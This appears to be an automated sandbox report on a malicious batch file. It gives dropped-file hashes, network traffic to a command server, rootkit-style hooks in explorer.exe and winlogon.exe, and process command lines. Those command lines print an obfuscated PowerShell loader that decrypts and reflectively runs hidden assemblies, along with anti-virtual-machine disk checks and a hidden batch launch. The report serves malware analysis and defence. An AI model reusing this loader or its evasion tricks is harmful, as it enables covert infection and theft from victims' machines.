                            MD5:9BDC273BED40B8666562C1CF55CF35AB
                            SHA1:C99C338E2B9DA3FEBE248763E66C4563B6155537
                            SHA-256:FC974E37E278EC66C1E07D4011E7CE0A54E7EFFADF9D6D565404F0161AD1913C
                            SHA-512:A44CA3655ABDE272ACB6261E7850256719366DDB509A0ADF5EFD0289B9A7642361FAEE0D6F903E1B477AA37C58D82B3DED121EEEC05BDA13E8CE69D246CA80B8
                            Malicious:false
                            Preview:ElfChnk.................m.......t...............`...P...........................................................................................,...s...h...............T...=...................................................N...............................................w.......0.......................E...................................W...........).......M...3...:...........................................................................................................................&...................**......m........g..0..........i.e&........i.e.t.Q...H.C.A;.......A../...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....X...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

                            C:\Windows\System32\winevt\Logs\Windows PowerShell.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):320504
                            Entropy (8bit):3.9318038850693373
                            Encrypted:false
                            SSDEEP:6144:UgfRHVgfRLgfR8VgfRBgfROgfRHVgfRLgfR8VgfRBgfR27aze3znaze2gfRHVgf1:
                            MD5:989FE11B6850F4E607A4BB44FE61EE3F
                            SHA1:3BE41878FD7BAACDE6262191CEFAB3482CF1C1CA
                            SHA-256:F4C05CF2479E1CEA9D7317E6ACFB8B91F6A3866CBBEC691090E100A1B3943172
                            SHA-512:08C945B764CA8D833ACEB8E648864A611B52B629BA9BD55E9801D61FFCB7A29732FCEFFADD1CB206D41B062C6FF9C6D654D9753DA976C767D32A20B064D5B796
                            Malicious:false
                            Preview:ElfChnk.....................................p.........?.....................................................................Z. ............................................=..........................................................................................................................._...............8...........................f...................M...c...........................n...............................................&.......................................................................**................H"1..........B.&........B...._j..d.:Ad........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............

                            C:\Windows\Temp\__PSScriptPolicyTest_4bxtuddq.5xi.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Windows\Temp\__PSScriptPolicyTest_lvxm11ep.434.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Windows\appcompat\Programs\Amcache.hve

                            Download File
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:MS Windows registry file, NT/2000 or above
                            Category:dropped
                            Size (bytes):1835008
                            Entropy (8bit):4.4664723531859085
                            Encrypted:false
                            SSDEEP:6144:sIXfpi67eLPU9skLmb0b4zWSPKaJG8nAgejZMMhA2gX4WABl0uN8dwBCswSb+:RXD94zWlLZMM6YFH6++
                            MD5:6C2338766D8478DF3B9442DF7361058B
                            SHA1:542BE768E8C7ADF462F6F6E80DA7E53FE7337AAE
                            SHA-256:730FA60EF15D586994FCE66B5D90A2B29E0F6117E8E2E78A9C56DA74FC212A6D
                            SHA-512:67840BB92130BDFC1733591A3596B45D599958638EE0C1F49E0B673FBA1781B0D72258483F429C5E2C51AC7300C55B4708095581A0FB79C6C93BEBE9A54AA64A
                            Malicious:false
                            Preview:regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..0...............................................................................................................................................................................................................................................................................................................................................t-..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Windows\system32\wbem\Performance\WmiApRpl.h (copy)

                            Download File
                            Process:C:\Windows\System32\wbem\WMIADAP.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):3444
                            Entropy (8bit):5.011954215267298
                            Encrypted:false
                            SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                            MD5:B133A676D139032A27DE3D9619E70091
                            SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                            SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                            SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                            Malicious:false
                            Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai

                            \Device\ConDrv

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):85
                            Entropy (8bit):4.84935141926561
                            Encrypted:false
                            SSDEEP:3:jKMFIwpVh+d3LKMP9IdXMfyM9oM3Ky:jKMFIsV8d7Koq01R3Ky
                            MD5:D8C4F9FD5B972AE487170EA993933179
                            SHA1:32E61F1DD8A462CEDC6B7A636275363B011ABDA9
                            SHA-256:728A155A3A8272BB230C121C67CC90A986C11B84504E3902AC4EEDA9D8EC78ED
                            SHA-512:1F4E7C0C8DC83C0280E77290CF76738D0611FBB9ADBC4D76A7DF4FD2E1EE49F684400E16008ED58D89009D4FE67C456094E9610279B4A20DDAC39038A3F5D4DF
                            Malicious:false
                            Preview:Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden ..

                            \Device\Null

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with very long lines (2692), with CRLF line terminators
                            Category:dropped
                            Size (bytes):2839
                            Entropy (8bit):5.269550461652421
                            Encrypted:false
                            SSDEEP:48:9JFHDRBXRG8R4YRxyKB3k4B3KX9zS3FXBvY595f8bLb8MS91ccCwMqu1whc9pWiM:PFHDRtVt7vBpB6a5xY595f8bus3wMVd2
                            MD5:39401ABDD4A08EE5458DF7CB80F69CED
                            SHA1:A4F498F6E926AC3A23F561C1C582C51217FA9093
                            SHA-256:06CC781B4C21259ED5B86C26A54BFCFD61D5049BF62338571F77E801227FFAC1
                            SHA-512:7BC97E8DF1C92730F6462151B688F1A5952F220199BD52F963A6CEA4DC04EEF6C842D776D26DF845688C369935DD71FFFE269AA75DC10B017F5926D21448C9BD
                            Malicious:false
                            Preview:Windows PowerShell..Copyright (C) Microsoft Corporation. All rights reserved.....Try the new cross-platform PowerShell https://aka.ms/pscore6....PS C:\Users\user\Desktop> function Rgueq($eXEDy){.$HKJEc=[System.Security.Cryptography.Aes]::Create();.$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;.$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;.$HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ=');.$HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA==');.$HipTi=$HKJEc.CreateDecryptor();.$ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length);.$HipTi.Dispose();.$HKJEc.Dispose();.$ioqgE;}function qVeuI($eXEDy){.Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', '');.Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblc

                            Static File Info

                            General

                            File type:DOS batch file, ASCII text, with very long lines (5674), with CRLF line terminators
                            Entropy (8bit):6.008710946572079
                            TrID:
                            • BibTeX references (5501/1) 100.00%
                            File name:1.cmd
                            File size:5'214'429 bytes
                            MD5:19fc666f7494d78a55d6b50a0252c214
                            SHA1:8876cd520507cbfdc2e89e449baba52232a1df1b
                            SHA256:e96f8f61e3af77c429ae6af54c128f7b8420a45a0a63bdfcacd682773b8e5fc1
                            SHA512:94dde8d5d0100e892ca004556b30b8e8fedacc1e3482dab9d611bd64569b2f73e29da93db2c7ae51585791a4f39d01426ee6663c48602de92aa74f6ebe3f630a
                            SSDEEP:49152:9YFeyNRX+o9UIcbBIXu/DloMIZv/us2aFGKeXGuqzwIEqHL5l8M/CJs2:f
                            TLSH:8536120B1D54ECBECDA50DAEE95A2F0FF432BE57F02909B6611B05BD07781E104D9A3A
                            File Content Preview:@echo off..%^%@%KhlQYXcflBNlDRnjWyCtzUMbVdihsfHGoAGNTEJeLZNLqMbLlXPalwqPvjUVOUMfTgWclzprOxHzgaKicxWvpHuSkQsKJOpQnISjQYALHylNOQJuzMSrYqQlLdSuhFIahRmyiAsdWkORvHethXkXVYRWSGyNffDcPlGXEkmYtPvNCYPeZznkuLejZqGBcFYQHLck%%^%e%hPWLmDgCetTQtOGStIdgwXoEKVOREgRWEdRJq

                            File Icon

                            Icon Hash:9686878b929a9886

                            Network Behavior

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Oct 4, 2024 09:43:11.225049973 CEST498356969192.168.2.4192.64.119.55
                            Oct 4, 2024 09:43:11.229967117 CEST696949835192.64.119.55192.168.2.4
                            Oct 4, 2024 09:43:11.230060101 CEST498356969192.168.2.4192.64.119.55
                            Oct 4, 2024 09:43:11.238358021 CEST498356969192.168.2.4192.64.119.55
                            Oct 4, 2024 09:43:11.243372917 CEST696949835192.64.119.55192.168.2.4
                            Oct 4, 2024 09:43:32.616575003 CEST696949835192.64.119.55192.168.2.4
                            Oct 4, 2024 09:43:32.616772890 CEST498356969192.168.2.4192.64.119.55
                            Oct 4, 2024 09:43:32.623522043 CEST498356969192.168.2.4192.64.119.55
                            Oct 4, 2024 09:43:32.628834009 CEST696949835192.64.119.55192.168.2.4
                            Oct 4, 2024 09:43:36.349204063 CEST499936969192.168.2.4192.64.119.55
                            Oct 4, 2024 09:43:36.358129025 CEST696949993192.64.119.55192.168.2.4
                            Oct 4, 2024 09:43:36.359184027 CEST499936969192.168.2.4192.64.119.55
                            Oct 4, 2024 09:43:36.361568928 CEST499936969192.168.2.4192.64.119.55
                            Oct 4, 2024 09:43:36.374773979 CEST696949993192.64.119.55192.168.2.4
                            Oct 4, 2024 09:43:57.712136030 CEST696949993192.64.119.55192.168.2.4
                            Oct 4, 2024 09:43:57.712508917 CEST499936969192.168.2.4192.64.119.55
                            Oct 4, 2024 09:43:57.712898016 CEST499936969192.168.2.4192.64.119.55
                            Oct 4, 2024 09:43:57.717854977 CEST696949993192.64.119.55192.168.2.4
                            Oct 4, 2024 09:44:01.113701105 CEST500166969192.168.2.4192.64.119.55
                            Oct 4, 2024 09:44:01.119086981 CEST696950016192.64.119.55192.168.2.4
                            Oct 4, 2024 09:44:01.119292974 CEST500166969192.168.2.4192.64.119.55
                            Oct 4, 2024 09:44:01.119541883 CEST500166969192.168.2.4192.64.119.55
                            Oct 4, 2024 09:44:01.124370098 CEST696950016192.64.119.55192.168.2.4
                            Oct 4, 2024 09:44:22.509109020 CEST696950016192.64.119.55192.168.2.4
                            Oct 4, 2024 09:44:22.509397030 CEST500166969192.168.2.4192.64.119.55
                            Oct 4, 2024 09:44:33.882853031 CEST500166969192.168.2.4192.64.119.55
                            Oct 4, 2024 09:44:33.888209105 CEST696950016192.64.119.55192.168.2.4

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Oct 4, 2024 09:43:11.203910112 CEST6273253192.168.2.41.1.1.1
                            Oct 4, 2024 09:43:11.218769073 CEST53627321.1.1.1192.168.2.4

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Oct 4, 2024 09:43:11.203910112 CEST192.168.2.41.1.1.10x3e9aStandard query (0)azure-winsecure.comA (IP address)IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Oct 4, 2024 09:43:11.218769073 CEST1.1.1.1192.168.2.40x3e9aNo error (0)azure-winsecure.com192.64.119.55A (IP address)IN (0x0001)false

                            Code Manipulations

                            User Modules

                            Hook Summary

                            Function NameHook TypeActive in Processes
                            ZwEnumerateKeyINLINEexplorer.exe, winlogon.exe
                            NtQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                            ZwResumeThreadINLINEexplorer.exe, winlogon.exe
                            NtDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                            ZwDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                            NtEnumerateKeyINLINEexplorer.exe, winlogon.exe
                            NtQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                            ZwEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                            ZwQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                            NtResumeThreadINLINEexplorer.exe, winlogon.exe
                            RtlGetNativeSystemInformationINLINEexplorer.exe, winlogon.exe
                            NtQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                            NtEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                            ZwQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                            ZwQueryDirectoryFileINLINEexplorer.exe, winlogon.exe

                            Processes

                            Process: explorer.exe, Module: ntdll.dll
                            Function NameHook TypeNew Data
                            ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                            NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                            ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                            NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                            ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                            NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                            NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                            ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                            ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                            NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                            RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                            NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                            NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                            ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                            ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                            Process: winlogon.exe, Module: ntdll.dll
                            Function NameHook TypeNew Data
                            ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                            NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                            ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                            NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                            ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                            NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                            NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                            ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                            ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                            NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                            RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                            NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                            NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                            ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                            ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                            Statistics

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:03:41:59
                            Start date:04/10/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1.cmd" "
                            Imagebase:0x7ff7183f0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:1
                            Start time:03:41:59
                            Start date:04/10/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:2
                            Start time:03:41:59
                            Start date:04/10/2024
                            Path:C:\Windows\System32\wbem\WMIC.exe
                            Wow64 process (32bit):false
                            Commandline:wmic diskdrive get Model
                            Imagebase:0x7ff78ee20000
                            File size:576'000 bytes
                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:3
                            Start time:03:41:59
                            Start date:04/10/2024
                            Path:C:\Windows\System32\findstr.exe
                            Wow64 process (32bit):false
                            Commandline:findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
                            Imagebase:0x7ff624f90000
                            File size:36'352 bytes
                            MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:4
                            Start time:03:42:00
                            Start date:04/10/2024
                            Path:C:\Windows\System32\wbem\WMIC.exe
                            Wow64 process (32bit):false
                            Commandline:wmic diskdrive get Manufacturer,Model
                            Imagebase:0x7ff78ee20000
                            File size:576'000 bytes
                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:5
                            Start time:03:42:00
                            Start date:04/10/2024
                            Path:C:\Windows\System32\findstr.exe
                            Wow64 process (32bit):false
                            Commandline:findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
                            Imagebase:0x7ff624f90000
                            File size:36'352 bytes
                            MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:6
                            Start time:03:42:02
                            Start date:04/10/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
                            Imagebase:0x7ff7183f0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:7
                            Start time:03:42:02
                            Start date:04/10/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell.exe -WindowStyle Hidden
                            Imagebase:0x7ff788560000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:10
                            Start time:03:42:08
                            Start date:04/10/2024
                            Path:C:\Windows\System32\WerFault.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\WerFault.exe -u -p 1284 -s 2444
                            Imagebase:0x7ff79b100000
                            File size:570'736 bytes
                            MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:15
                            Start time:03:42:33
                            Start date:04/10/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
                            Imagebase:0x7ff7183f0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:16
                            Start time:03:42:33
                            Start date:04/10/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:17
                            Start time:03:42:33
                            Start date:04/10/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
                            Imagebase:0x7ff7183f0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:18
                            Start time:03:42:33
                            Start date:04/10/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell.exe -WindowStyle Hidden
                            Imagebase:0x7ff72bec0000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:19
                            Start time:03:42:34
                            Start date:04/10/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
                            Imagebase:0x7ff7183f0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:20
                            Start time:03:42:34
                            Start date:04/10/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
